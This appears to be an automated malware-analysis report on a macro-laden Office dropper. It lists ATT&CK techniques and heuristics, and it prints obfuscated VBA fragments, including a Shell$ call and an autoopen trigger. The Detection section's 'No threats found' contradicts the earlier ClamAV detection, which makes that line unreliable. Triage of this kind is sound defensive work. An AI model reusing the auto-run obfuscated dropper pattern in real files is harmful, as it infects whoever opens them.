Risk Score: 152 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file contains VBA macros, including an AutoOpen macro, and a critical heuristic indicates a potential Shell call. ClamAV identifies it as 'Doc.Dropper.Agent-6340521-0'. The VBA script is heavily obfuscated, but its structure and the presence of a 'macros.bas' file suggest it is designed to download and execute a secondary payload, likely exploiting a vulnerability for client execution.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6340521-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6340521-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:

  ```vb
  sNnxXXWTuYB = "mkBaYYRTa" + "XuXtDpkGBr" + "YnBYhekRt" + "yYsFTRcmEVN" + "vRtEHLKYz" + GurpsyPWpZ = "LMMAuanGN" + "hbwYuBNZBxT" + "SUUkyeVpNhn" + "SgvCUcwfXD" + "PTDUKDKCwS" + "VMXPazvvXZ"
  Shell$ "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + PBgapTPRnHw + Mid(NrvyPdN, 40) + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + XkgssYWAC, 0
  TczWGRhTe = "GteLYyxd" + "cFGrkca" + "FUMmkPtpAgt" + "WMaGfEYwuG" + "evnywAPwVVe" + WmAmHkLemW = "gNCSxuK" + "FgSgTGxPUUr" + "fSbHpzY" + "nTVUNWtYpR" + "zabybWrgCbH" + NasynaB = "sSrnkcuPbn" + "LEbkfzk" + "SYHHfhFUH" + "RwLKPKwuf" + "WeMWfnWf" + rfXUWNSeG = "BTSNpkEyB" + "eLcTrdd" + "rsxpSLHZDh" + "hwrZBAFrHeB" + "eNubVBSaA" + "nBXeeCpvZ"
  ```

- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:

  ```vb
  End Function
  Sub autoopen()
  fdSZuSKDbTn
  ```

- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7001 bytes |

SHA-256: f3415535efe8b12fc06e3356a37c7341b1fbfce18902579736a417760387ec34

Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 369 of 442 identifiers look randomly generated (e.g. 'vUGfKDmDTxM'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script